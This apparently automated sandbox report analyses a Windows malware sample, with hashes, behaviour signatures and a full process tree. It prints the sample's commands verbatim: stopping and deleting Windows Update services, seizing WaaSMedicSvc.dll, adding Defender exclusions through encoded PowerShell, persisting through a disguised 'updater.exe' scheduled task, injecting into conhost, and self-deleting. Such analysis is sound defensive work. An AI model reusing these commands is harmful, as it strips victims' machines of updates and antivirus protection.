Analysis
-
max time kernel
300s -
max time network
299s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
25-08-2022 22:15
Static task
static1
Behavioral task
behavioral1
Sample
06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe
Resource
win7-20220812-en
General
-
Target
06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe
-
Size
4.3MB
-
MD5
4f0dcfb8b8cf69bb60c7c051554f0fc5
-
SHA1
992f2bf6e63b6894c6f5311efa2cf908e50621d1
-
SHA256
06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130
-
SHA512
936a221740b37898a24606732b2aab688c332ce35fc6f5c7a1ca166f024bd9cd9c7e332b19e01e3ad26ca4d50b2bc45e512e315a2b0dfa3c14301ecc4aeeb83c
-
SSDEEP
98304:L56u2b1q7yXmonPI9d80h0zlLKc7ol9qSrQDrmPTj1CWDcWt4RdKFnb71:16N1+ImonA9d80hSKNmS8Drmn9dSCFnt
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe -
Drops file in Drivers directory 2 IoCs
Processes:
06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exeupdater.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe File opened for modification C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 2 IoCs
Processes:
updater.execonhost.exepid process 1916 updater.exe 944 conhost.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1684 takeown.exe 1636 icacls.exe 1488 takeown.exe 764 icacls.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 960 cmd.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 2016 taskeng.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1488 takeown.exe 764 icacls.exe 1684 takeown.exe 1636 icacls.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
updater.exedescription pid process target process PID 1916 set thread context of 944 1916 updater.exe conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 276 sc.exe 884 sc.exe 800 sc.exe 300 sc.exe 852 sc.exe 584 sc.exe 672 sc.exe 1776 sc.exe 1868 sc.exe 1608 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1280 reg.exe 1688 reg.exe 1300 reg.exe 1688 reg.exe 980 reg.exe 1552 reg.exe 1564 reg.exe 1536 reg.exe 752 reg.exe 880 reg.exe 968 reg.exe 1700 reg.exe 1144 reg.exe 1252 reg.exe 824 reg.exe 1748 reg.exe 604 reg.exe 292 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exepowershell.execonhost.exepid process 1740 powershell.exe 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe 1224 powershell.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe 944 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 460 -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exe06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exepowershell.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowercfg.execonhost.exeupdater.exedescription pid process Token: SeDebugPrivilege 1740 powershell.exe Token: SeShutdownPrivilege 1916 powercfg.exe Token: SeShutdownPrivilege 1756 powercfg.exe Token: SeShutdownPrivilege 1772 powercfg.exe Token: SeShutdownPrivilege 1224 powercfg.exe Token: SeTakeOwnershipPrivilege 1684 takeown.exe Token: SeDebugPrivilege 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe Token: SeDebugPrivilege 1224 powershell.exe Token: SeShutdownPrivilege 1336 powercfg.exe Token: SeShutdownPrivilege 936 powercfg.exe Token: SeShutdownPrivilege 940 powercfg.exe Token: SeTakeOwnershipPrivilege 1488 takeown.exe Token: SeShutdownPrivilege 1492 powercfg.exe Token: SeLockMemoryPrivilege 944 conhost.exe Token: SeLockMemoryPrivilege 944 conhost.exe Token: SeDebugPrivilege 1916 updater.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.execmd.execmd.execmd.exedescription pid process target process PID 1996 wrote to memory of 1740 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe powershell.exe PID 1996 wrote to memory of 1740 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe powershell.exe PID 1996 wrote to memory of 1740 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe powershell.exe PID 1996 wrote to memory of 1268 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe cmd.exe PID 1996 wrote to memory of 1268 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe cmd.exe PID 1996 wrote to memory of 1268 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe cmd.exe PID 1996 wrote to memory of 1632 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe cmd.exe PID 1996 wrote to memory of 1632 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe cmd.exe PID 1996 wrote to memory of 1632 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe cmd.exe PID 1632 wrote to memory of 1916 1632 cmd.exe powercfg.exe PID 1632 wrote to memory of 1916 1632 cmd.exe powercfg.exe PID 1632 wrote to memory of 1916 1632 cmd.exe powercfg.exe PID 1268 wrote to memory of 300 1268 cmd.exe sc.exe PID 1268 wrote to memory of 300 1268 cmd.exe sc.exe PID 1268 wrote to memory of 300 1268 cmd.exe sc.exe PID 1268 wrote to memory of 852 1268 cmd.exe sc.exe PID 1268 wrote to memory of 852 1268 cmd.exe sc.exe PID 1268 wrote to memory of 852 1268 cmd.exe sc.exe PID 1268 wrote to memory of 584 1268 cmd.exe sc.exe PID 1268 wrote to memory of 584 1268 cmd.exe sc.exe PID 1268 wrote to memory of 584 1268 cmd.exe sc.exe PID 1632 wrote to memory of 1756 1632 cmd.exe powercfg.exe PID 1632 wrote to memory of 1756 1632 cmd.exe powercfg.exe PID 1632 wrote to memory of 1756 1632 cmd.exe powercfg.exe PID 1268 wrote to memory of 276 1268 cmd.exe sc.exe PID 1268 wrote to memory of 276 1268 cmd.exe sc.exe PID 1268 wrote to memory of 276 1268 cmd.exe sc.exe PID 1268 wrote to memory of 672 1268 cmd.exe sc.exe PID 1268 wrote to memory of 672 1268 cmd.exe sc.exe PID 1268 wrote to memory of 672 1268 cmd.exe sc.exe PID 1632 wrote to memory of 1772 1632 cmd.exe powercfg.exe PID 1632 wrote to memory of 1772 1632 cmd.exe powercfg.exe PID 1632 wrote to memory of 1772 1632 cmd.exe powercfg.exe PID 1632 wrote to memory of 1224 1632 cmd.exe powercfg.exe PID 1632 wrote to memory of 1224 1632 cmd.exe powercfg.exe PID 1632 wrote to memory of 1224 1632 cmd.exe powercfg.exe PID 1268 wrote to memory of 1552 1268 cmd.exe reg.exe PID 1268 wrote to memory of 1552 1268 cmd.exe reg.exe PID 1268 wrote to memory of 1552 1268 cmd.exe reg.exe PID 1268 wrote to memory of 1280 1268 cmd.exe reg.exe PID 1268 wrote to memory of 1280 1268 cmd.exe reg.exe PID 1268 wrote to memory of 1280 1268 cmd.exe reg.exe PID 1268 wrote to memory of 1252 1268 cmd.exe reg.exe PID 1268 wrote to memory of 1252 1268 cmd.exe reg.exe PID 1268 wrote to memory of 1252 1268 cmd.exe reg.exe PID 1268 wrote to memory of 880 1268 cmd.exe reg.exe PID 1268 wrote to memory of 880 1268 cmd.exe reg.exe PID 1268 wrote to memory of 880 1268 cmd.exe reg.exe PID 1268 wrote to memory of 824 1268 cmd.exe reg.exe PID 1268 wrote to memory of 824 1268 cmd.exe reg.exe PID 1268 wrote to memory of 824 1268 cmd.exe reg.exe PID 1268 wrote to memory of 1684 1268 cmd.exe takeown.exe PID 1268 wrote to memory of 1684 1268 cmd.exe takeown.exe PID 1268 wrote to memory of 1684 1268 cmd.exe takeown.exe PID 1268 wrote to memory of 1636 1268 cmd.exe icacls.exe PID 1268 wrote to memory of 1636 1268 cmd.exe icacls.exe PID 1268 wrote to memory of 1636 1268 cmd.exe icacls.exe PID 1996 wrote to memory of 1944 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe cmd.exe PID 1996 wrote to memory of 1944 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe cmd.exe PID 1996 wrote to memory of 1944 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe cmd.exe PID 1944 wrote to memory of 568 1944 cmd.exe schtasks.exe PID 1944 wrote to memory of 568 1944 cmd.exe schtasks.exe PID 1944 wrote to memory of 568 1944 cmd.exe schtasks.exe PID 1996 wrote to memory of 552 1996 06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe"C:\Users\Admin\AppData\Local\Temp\06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AegBpAGYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB6AGcAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAcgBzAGEAIwA+ACAAQAAoACAAPAAjAHQAZwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAbAB0AHIAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAdgBhAG0AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZwB0AHcAcQAjAD4A"2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1740 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:300 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:852 -
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:584 -
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:276 -
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:672 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
PID:1552 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
PID:1280 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
PID:1252 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
PID:880 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
PID:824 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1684 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1636 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
PID:1688 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
PID:1564 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
PID:1748 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
PID:1300 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵PID:1692
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵PID:1468
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵PID:1924
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵PID:752
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵PID:852
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵PID:316
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:1548
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1916 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1756 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "TaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\onedrive\updater.exe\""2⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "TaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\onedrive\updater.exe\""3⤵
- Creates scheduled task(s)
PID:568 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "TaskMachineQC"2⤵PID:552
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "TaskMachineQC"3⤵PID:936
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe"2⤵
- Deletes itself
PID:960 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1580
-
C:\Windows\system32\taskeng.exetaskeng.exe {394466D6-04AC-4F7F-A2AA-869DF92E83DA} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]1⤵
- Loads dropped DLL
PID:2016 -
C:\Users\Admin\AppData\Roaming\onedrive\updater.exeC:\Users\Admin\AppData\Roaming\onedrive\updater.exe2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AegBpAGYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB6AGcAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAcgBzAGEAIwA+ACAAQAAoACAAPAAjAHQAZwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAbAB0AHIAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAdgBhAG0AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZwB0AHcAcQAjAD4A"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1224 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:1504
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:1776 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1868 -
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:884 -
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:800 -
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:1608 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
PID:968 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
PID:1700 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
PID:1688 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
PID:1536 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
PID:604 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1488 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:764 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
PID:980 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
PID:752 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1144 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:292 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵PID:788
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵PID:1760
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵PID:468
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵PID:672
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵PID:1736
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵PID:748
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:636
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵PID:1560
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1336 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:936 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:940 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1492 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "TaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\onedrive\updater.exe\""3⤵PID:1964
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "TaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\onedrive\updater.exe\""4⤵
- Creates scheduled task(s)
PID:1584 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "yzwyhvirgqrdsr"3⤵PID:1776
-
